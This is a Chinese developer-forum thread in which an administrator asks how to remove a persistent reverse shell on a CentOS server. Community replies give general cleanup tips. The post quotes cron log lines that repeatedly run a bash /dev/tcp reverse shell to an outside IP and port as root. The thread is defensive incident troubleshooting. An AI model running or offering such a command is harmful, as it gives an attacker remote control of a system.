开发者社区> 问答> 正文

反弹SHELL如何清除

大家好,最近我们的CENTOS服务器中了反弹SHELL。幸好我们有防火墙。反弹SHELL无法兴风作浪。但是我们KILL掉反弹SHELL的进程,他还是会继续起来。而且由于反弹SHELL无法连接远程服务器(因为防火墙挡住了),一直在重启连接。
我们查看了计划任务crontab -l .没有发现任何异常。但是在cron的日志里面,就发现了反弹SHELL的启动日志。如下:
Apr 10 08:23:01 iZgw82jiymwc5j3yi9fjg3Z CROND[2841]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
Apr 10 08:24:01 iZgw82jiymwc5j3yi9fjg3Z CROND[3716]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
Apr 10 08:25:01 iZgw82jiymwc5j3yi9fjg3Z CROND[9405]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
Apr 10 08:26:01 iZgw82jiymwc5j3yi9fjg3Z CROND[10350]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
Apr 10 08:27:01 iZgw82jiymwc5j3yi9fjg3Z CROND[11148]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
Apr 10 08:28:01 iZgw82jiymwc5j3yi9fjg3Z CROND[11890]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
Apr 10 08:29:01 iZgw82jiymwc5j3yi9fjg3Z CROND[12568]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
但是再去仔细看crontab -l.里面也没有找到这个命令。请问如何能够找到这个日志里面的执行脚本或者执行命令的位置,谢谢

展开
收起
topflytech 2018-04-10 09:03:05 17617 0
4 条回答
写回答
取消 提交回答
  • Sinesafe专注于网站安全,服务器安全,解决各类网络安全问题,对代码审计以及漏洞修补安全加固有专业的十年实战经验.官方站点www.sinesafe.com

    服务器被提示反弹shell的话肯定是服务器或应用有漏洞导致被黑客执行了反弹shell的命令,建议向网站漏洞修复公司SINE安全寻求技术支持。

    2022-07-28 14:56:04
    赞同 1 展开评论 打赏
  • 10年的互联网从业经验,熟悉Win和Linux运维方面实战技术,常用PHP和Nodejs作为服务端开发载体,学习移动端混合开发框架,如weex vue
    检查自启动进程 非系统和自己安装的都 kill -9掉
    关闭 非安全的 tty连接
    删除 非法用户
    2018-05-12 16:33:51
    赞同 展开评论 打赏
  • Re反弹SHELL如何清除
    我也是整天反弹 不知道怎么排查
    2018-05-10 12:38:50
    赞同 展开评论 打赏
  • 旺旺:nectar2。
    楼主您好,

    是否可能在文件系统里搜索某些关键字符(如IP地址),看是否能搜索到包含这些关键字符的文件?
    2018-04-15 10:41:12
    赞同 展开评论 打赏
问答排行榜
最热
最新

相关电子书

更多
Shell 脚本速查手册 立即下载
低代码开发师(初级)实战教程 立即下载
阿里巴巴DevOps 最佳实践手册 立即下载